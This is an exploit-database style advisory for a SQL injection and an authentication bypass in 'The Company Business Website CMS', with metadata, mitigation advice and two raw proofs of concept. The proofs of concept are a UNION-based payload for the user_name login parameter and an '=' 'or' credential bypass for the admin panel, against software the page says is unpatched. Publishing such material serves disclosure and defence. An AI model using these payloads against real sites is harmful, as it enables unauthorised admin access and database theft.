The Company Business Website CMS - 'user_name' SQL Injection

vendor:

The Company Business Website CMS

by:

Ahmet Ümit BAYRAM

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: The Company Business Website CMS

Affected Version From: Lastest

Affected Version To: Lastest

Patch Exists: NO

Related CWE:

CPE: a:codester:the_company_business_website_cms

Metasploit:

Other Scripts:

Platforms Tested: Kali Linux

2019

The Company Business Website CMS – ‘user_name’ SQL Injection

The Company Business Website CMS is vulnerable to SQL Injection in the 'user_name' parameter. An attacker can exploit this vulnerability to execute arbitrary SQL commands.

Mitigation:

Sanitize user input before using it in SQL queries. Use prepared statements or parameterized queries to prevent SQL Injection.

Source

Exploit-DB raw data:

# Exploit Title: The Company Business Website CMS - 'user_name' SQL
Injection
# Date: 20.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.codester.com/items/6806/the-company-business-website-cms
# Demo Site: http://thecompany.morkocbilisim.com
# Version: Lastest
# Tested on: Kali Linux
# CVE: N/A

----- PoC: SQLi -----

Request: http://localhost/[PATH]/admin/production/login.php
Vulnerable Parameter: user_name (POST)
Payload: user_name=VNfn' UNION ALL SELECT
NULL,NULL,NULL,CONCAT(CONCAT('qqkxq','mOiFXJaJzzATyiPlJyQgwuuTiDddtckLMPRRRdEH'),'qjbbq'),NULL,NULL,NULL,NULL--
WMfV&user_password=&loggin=Psop


# Exploit Title: The Company Business Website CMS - Authentication Bypass
# Date: 20.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.codester.com/items/6806/the-company-business-website-cms
# Demo Site: http://thecompany.morkocbilisim.com
# Version: Lastest
# Tested on: Kali Linux
# CVE: N/A
----- PoC: Authentication Bypass -----
Administration Panel: http://localhost/[PATH]/admin/production/login.php
Username: '=' 'or'
Password: '=' 'or'